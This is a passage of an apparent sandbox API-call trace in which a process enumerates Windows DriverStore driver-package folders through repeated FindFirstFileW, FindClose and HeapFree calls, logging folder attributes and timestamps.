[0026.106] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.106] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidir.inf_amd64_neutral_5b48c4b1b49ca54a\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d604745, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6077d08f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6077d08f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.107] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.107] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidirkbd.inf_amd64_neutral_2b561a02e977e2e3\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d781508, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6077d08f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6077d08f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.107] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.107] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidserv.inf_amd64_neutral_f2223e39f37c69f3\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x432da1f0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61fe323c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61fe323c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.108] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.108] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.108] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1nd.inf_amd64_neutral_cf39c48277e038de\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b549889, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60163824, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60163824, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.108] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.108] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.108] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1sd.inf_amd64_neutral_caaa16c52c48f8ac\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b5bbca9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60189984, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60189984, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.109] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.109] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1so.inf_amd64_neutral_4f1a3f1015001339\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b65422a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x601d5c44, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x601d5c44, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.109] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.109] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1ss.inf_amd64_neutral_8cae09a2238d64e0\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b6c664b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x601fbda5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x601fbda5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.110] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.110] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.110] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpsamd.inf_amd64_neutral_84ae149ecc9f8033\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3980691d, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bf011a5, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bf011a5, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.110] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.110] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.110] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iastorv.inf_amd64_neutral_668286aa35d55928\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x394e6c37, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3be8ed84, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3be8ed84, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.110] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.110] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\igdlh.inf_amd64_neutral_54a12b57f547d08e\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f35365b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60d4a63a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60d4a63a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.112] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.113] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.113] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iirsp.inf_amd64_neutral_25c14d33af7f54f1\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x425504b7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61dcdef8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61dcdef8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.113] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.113] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.116] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iirsp2.inf_amd64_neutral_9ed65fe0bab06b1b\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x425e8a38, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61df4058, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61df4058, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.116] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.116] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.116] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\image.inf_amd64_neutral_4a983035eaabe2f4\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ed860b0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60b5b456, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60b5b456, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.117] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.117] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\input.inf_amd64_neutral_8693053514b10ee9\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3904a18f, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x83f9555a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x3bcc5d01, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.118] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.119] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.119] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ipmidrv.inf_amd64_neutral_1cb648411f252d13\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a45fb54, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c35198d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c35198d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.119] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.119] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.119] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iscsi.inf_amd64_neutral_2ef24e9270d8b2a9\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a37b312, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c32b82d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c32b82d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.120] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.120] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.120] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\keyboard.inf_amd64_neutral_0684fdc43059f486\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x38f1968d, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bc538e0, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bc538e0, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.121] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.121] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.121] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ks.inf_amd64_neutral_2b583ce4a6a029a1\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39d0983c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f745a91, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f745a91, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.122] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.122] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.122] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\kscaptur.inf_amd64_neutral_6cb3fb6811a3f83d\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e720584, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60a76c14, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60a76c14, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.122] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.122] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.122] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ksfilter.inf_amd64_neutral_86311fdf78a07678\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e7b8b05, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60a76c14, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60a76c14, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.123] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.123] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.123] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_fc.inf_amd64_neutral_a7088f3644ca646a\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41838b9f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x617683cc, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x617683cc, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.123] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.123] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.123] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_sas.inf_amd64_neutral_a4d6780f72cbd5b4\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x418f7280, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61826aae, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61826aae, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.124] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.124] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.124] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_sas2.inf_amd64_neutral_e12a5c4cfbe49204\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4198f801, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6190b2ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6190b2ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.125] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.125] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.125] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_scsi.inf_amd64_neutral_cfbbf0b0b66ba280\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41a27d82, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x619efb31, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x619efb31, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.127] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.127] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.127] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\machine.inf_amd64_neutral_a2f120466549d68b\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x38b87586, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x45ea362b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x45ea362b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.129] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.130] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mchgr.inf_amd64_neutral_407146dba80d1566\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a1d83ef, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c2932ac, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c2932ac, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.131] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.132] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.132] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mcx2.inf_amd64_neutral_8cf9cade8f7bba56\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e8e9608, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60ac2ed5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60ac2ed5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.133] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.133] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.133] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdm3com.inf_amd64_neutral_11abcf129a29fb9f\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x491c4fdf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e96a2d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e96a2d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.133] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.133] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.133] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdm5674a.inf_amd64_neutral_46f893a4f998bb46\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x492a9820, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6711e191, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6711e191, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.134] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.134] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.134] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmadc.inf_amd64_neutral_62d6e6995428f9d0\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4938e062, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6711e191, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6711e191, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.134] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.134] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.134] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmagm64.inf_amd64_neutral_ef322a8cc2738a9b\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5023e02e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6bf5f562, 